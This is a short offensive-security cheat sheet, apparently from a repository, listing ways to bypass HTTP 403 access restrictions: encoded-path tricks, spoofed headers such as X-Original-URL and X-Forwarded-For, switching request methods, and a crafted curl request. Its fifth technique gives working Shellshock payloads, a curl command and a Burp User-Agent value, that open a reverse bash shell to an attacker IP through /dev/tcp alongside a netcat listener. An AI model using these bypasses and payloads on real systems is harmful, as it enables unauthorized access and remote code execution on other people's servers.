1.2 KiB
1.2 KiB
How to bypass 403 Errors
Technique number 1
- Appending
{%2e} or {%2f} { **/*, /./}
after the first slash- https://www.domain/DB = 403
- https://www.domain/%2e/DB] =200
- https://www.domain/./DB] =200
Technique number 2
- Adding headers to requests module.
- Content-Length: 0
- X-rewrite-url
- X-Original-URL
- X-Custom-IP-Authorization
- X-Forwarded-For
Technique number 3
- Change the request method
- GET → POST
- GET → TRACE
- GET → PUT
- GET → OPTIONS
Technique number 4
- Using Curl
- curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/'
Technique number 5
- Brute force sub directory from the 403 directory
- Try using (wordlist/dirb/comon.txt)
- Setup Netcat lisener
- Inject parameters from Curl or Burp Suite
- CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi
- Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
- More info ---> https://hackbotone.com/shellshock-attack-on-a-remote-web-server-d9124f4a0af3